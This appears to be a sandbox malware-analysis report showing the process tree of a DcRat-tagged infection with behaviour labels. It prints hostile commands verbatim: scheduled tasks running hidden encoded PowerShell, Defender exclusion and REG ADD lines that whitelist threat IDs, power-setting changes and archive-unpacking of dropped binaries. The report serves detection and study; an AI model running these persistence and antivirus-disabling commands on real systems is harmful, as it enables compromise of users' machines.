C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gOyuekOoF" /SC once /ST 05:50:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="7⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gOyuekOoF"7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gOyuekOoF"7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bfPiLOEoMHGtOUUyTU" /SC once /ST 10:45:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\QgmNzxRCOnLddotQj\VHmGlhdyjvOSxCI\quWSeVc.exe\" HU /site_id 525403 /S" /V1 /F7⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\oliTE7I5ZYme1xuvDC5xCEN6.exe"C:\Users\Admin\Pictures\Adobe Films\oliTE7I5ZYme1xuvDC5xCEN6.exe"4⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "Get-WmiObject Win32_PortConnector"5⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- DcRat
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Minor Policy\RPBX3D0F1v8sdSzILvp_V9ej.exe"C:\Users\Admin\Pictures\Minor Policy\RPBX3D0F1v8sdSzILvp_V9ej.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\Gcbxo38mx9Eb6jbVgQrrDlO3.exe"C:\Users\Admin\Pictures\Minor Policy\Gcbxo38mx9Eb6jbVgQrrDlO3.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\notification.exe"C:\Users\Admin\AppData\Local\Temp\notification.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"4⤵
-
C:\Windows\system32\mode.commode 65,105⤵
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e file.zip -p28212181714525110601836129965 -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_6.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_5.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_4.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_3.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_2.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_1.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\attrib.exeattrib +H "alex.exe"5⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\main\alex.exe"alex.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C powershell -EncodedCommand "PAAjAFoAeABkAEcAdQA1AHAAeQB0AHYAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBtAEoANgB4AE8AMABiAGwAeAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBVAHkAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAWQBMAEoAcwBFAEoAZABaAEsAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAFoAeABkAEcAdQA1AHAAeQB0AHYAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBtAEoANgB4AE8AMABiAGwAeAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBVAHkAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAWQBMAEoAcwBFAEoAZABaAEsAIwA+AA=="7⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk7375" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk7375" /TR "C:\ProgramData\Dllhost\dllhost.exe"7⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵
-
C:\Users\Admin\Pictures\Minor Policy\ir9gjvRMntVPL00hIaR6BUAy.exe"C:\Users\Admin\Pictures\Minor Policy\ir9gjvRMntVPL00hIaR6BUAy.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\ir9gjvRMntVPL00hIaR6BUAy.exe"C:\Users\Admin\Pictures\Minor Policy\ir9gjvRMntVPL00hIaR6BUAy.exe" -h3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\eHfp4jEkBb5TQ05bXtxVm10a.exe"C:\Users\Admin\Pictures\Minor Policy\eHfp4jEkBb5TQ05bXtxVm10a.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Minor Policy\CViOa0pRCb577LiXICjTzxAD.exe"C:\Users\Admin\Pictures\Minor Policy\CViOa0pRCb577LiXICjTzxAD.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\1uynsXWyfa_nMHHTaw09Gsau.exe"C:\Users\Admin\Pictures\Minor Policy\1uynsXWyfa_nMHHTaw09Gsau.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\7w99zLa9PJExu0PFLLQsmPkT.exe"C:\Users\Admin\Pictures\Minor Policy\7w99zLa9PJExu0PFLLQsmPkT.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\zZ4TgZcjSCMWOa6EHHHS4Tb7.exe"C:\Users\Admin\Pictures\Minor Policy\zZ4TgZcjSCMWOa6EHHHS4Tb7.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 444 -p 4168 -ip 41681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4440 -ip 44401⤵
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open1⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 68852 -s 6002⤵
- Program crash
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4440 -ip 44401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 68852 -ip 688521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4440 -ip 44401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4440 -ip 44401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4440 -ip 44401⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 612 -p 5896 -ip 58961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5744 -ip 57441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 4440 -ip 44401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 5744 -ip 57441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 4440 -ip 44401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 5744 -ip 57441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 4440 -ip 44401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 5744 -ip 57441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 4440 -ip 44401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 5744 -ip 57441⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\wermgr.exe"C:\Windows\system32\wermgr.exe" "-outproc" "0" "8892" "1796" "1740" "1800" "0" "0" "1804" "0" "0" "0" "0" "0"2⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 5744 -ip 57441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 5744 -ip 57441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 5744 -ip 57441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 5744 -ip 57441⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe1⤵
- Drops file in Drivers directory
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\EB08.exeC:\Users\Admin\AppData\Local\Temp\EB08.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\Etfrehti.dll,start C:\Users\Admin\AppData\Local\Temp\EB08.exe2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Accesses Microsoft Outlook accounts
- Accesses Microsoft Outlook profiles
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Checks processor information in registry
- Modifies system certificate store
- outlook_office_path
- outlook_win_path
-
C:\Windows\SysWOW64\schtasks.exeschtasks /End /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61 140963⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /End /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /End /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /End /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /End /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /End /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /End /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /End /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /End /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /End /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /End /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /End /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /End /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /End /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /End /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /End /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /End /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /End /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /End /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /End /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /End /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 5122⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 5800 -ip 58001⤵
-
C:\Users\Admin\AppData\Local\Temp\QgmNzxRCOnLddotQj\VHmGlhdyjvOSxCI\quWSeVc.exeC:\Users\Admin\AppData\Local\Temp\QgmNzxRCOnLddotQj\VHmGlhdyjvOSxCI\quWSeVc.exe HU /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
